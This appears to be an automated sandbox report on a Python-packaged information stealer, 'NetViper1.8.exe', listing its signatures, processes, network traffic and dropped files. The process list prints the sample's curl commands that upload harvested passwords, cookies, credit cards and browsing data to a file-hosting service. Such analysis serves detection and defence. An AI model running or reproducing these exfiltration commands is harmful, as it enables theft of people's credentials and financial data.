Malware Analysis Report

2025-05-05 21:13

Sample ID 240626-pcaq6atfqh
Target NetViper1.8.exe
SHA256 883ee8ebbd9c6d9278628fb2a240a5e05640e032281a5b04742ad55a00f244cc
Tags
pyinstaller spyware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

883ee8ebbd9c6d9278628fb2a240a5e05640e032281a5b04742ad55a00f244cc

Threat Level: Shows suspicious behavior

The file NetViper1.8.exe was found to be: Shows suspicious behavior.

Malicious Activity Summary

pyinstaller spyware stealer

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Detects Pyinstaller

Unsigned PE

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 12:10

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 12:10

Reported

2024-06-26 12:11

Platform

win10v2004-20240226-es

Max time kernel

27s

Max time network

37s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetViper1.8.exe C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{14DBCCD9-270B-4085-9925-1463F6D09727} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2528 wrote to memory of 992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 5080 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2528 wrote to memory of 864 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe

"C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x23c,0x240,0x244,0x238,0x214,0x7ffa6c362e98,0x7ffa6c362ea4,0x7ffa6c362eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2568 --field-trial-handle=2572,i,5166390523967795314,1584889435232954462,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=es --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3004 --field-trial-handle=2572,i,5166390523967795314,1584889435232954462,262144 --variations-seed-version /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=es --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3288 --field-trial-handle=2572,i,5166390523967795314,1584889435232954462,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe

"C:\Users\Admin\AppData\Local\Temp\NetViper1.8.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=es --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4332 --field-trial-handle=2572,i,5166390523967795314,1584889435232954462,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=es --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4332 --field-trial-handle=2572,i,5166390523967795314,1584889435232954462,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile

Network

Country Destination Domain Proto
GB 142.250.200.14:443 tcp
US 13.107.6.158:443 tcp
GB 216.58.201.97:443 tcp
GB 142.250.200.10:443 tcp
GB 88.221.134.17:443 tcp
GB 92.123.128.143:443 tcp
GB 13.87.96.169:443 tcp
GB 51.140.244.186:443 tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
GB 216.58.204.67:443 update.googleapis.com tcp
US 13.107.246.64:443 edge-mobile-static.azureedge.net tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 rentry.co udp
US 104.26.3.16:443 rentry.co tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 16.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 51.38.43.18:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 18.43.38.51.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 store4.gofile.io udp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 245.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 74.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State


\??\pipe\crashpad_2528_MWOPUPVIFFILMODG


C:\Users\Admin\AppData\Local\Temp\_MEI27042\ucrtbase.dll


C:\Users\Admin\AppData\Local\Temp\_MEI27042\python312.dll


C:\Users\Admin\AppData\Local\Temp\_MEI27042\VCRUNTIME140.dll


C:\Users\Admin\AppData\Local\Temp\_MEI27042\base_library.zip


C:\Users\Admin\AppData\Local\Temp\_MEI27042\_ctypes.pyd


C:\Users\Admin\AppData\Local\Temp\_MEI27042\libffi-8.dll


C:\Users\Admin\AppData\Local\Temp\_MEI27042\_bz2.pyd


C:\Users\Admin\AppData\Local\Temp\_MEI27042\_lzma.pyd


C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-convert-l1-1-0.dll


C:\Users\Admin\AppData\Local\Temp\_MEI27042\_hashlib.pyd


C:\Users\Admin\AppData\Local\Temp\_MEI27042\_decimal.pyd


C:\Users\Admin\AppData\Local\Temp\_MEI27042\VCRUNTIME140_1.dll


C:\Users\Admin\AppData\Local\Temp\_MEI27042\unicodedata.pyd


C:\Users\Admin\AppData\Local\Temp\_MEI27042\sqlite3.dll


C:\Users\Admin\AppData\Local\Temp\_MEI27042\select.pyd


C:\Users\Admin\AppData\Local\Temp\_MEI27042\libssl-3.dll


C:\Users\Admin\AppData\Local\Temp\_MEI27042\libcrypto-3.dll


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports


C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-utility-l1-1-0.dll


C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-time-l1-1-0.dll


C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-string-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-stdio-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-runtime-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-process-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-math-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-locale-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-heap-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-filesystem-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-environment-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-crt-conio-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-console-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-util-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-timezone-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-sysinfo-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-synch-l1-2-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-synch-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-string-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-rtlsupport-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-profile-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-processthreads-l1-1-1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-processthreads-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-processenvironment-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-namedpipe-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-memory-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-localization-l1-2-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-libraryloader-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-interlocked-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-heap-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-handle-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-file-l2-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-file-l1-2-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-file-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-errorhandling-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-debug-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-datetime-l1-1-0.dll

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\e0495fde257df2ef62ee7e3fdb1ebb9d7ff72300.tbres

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
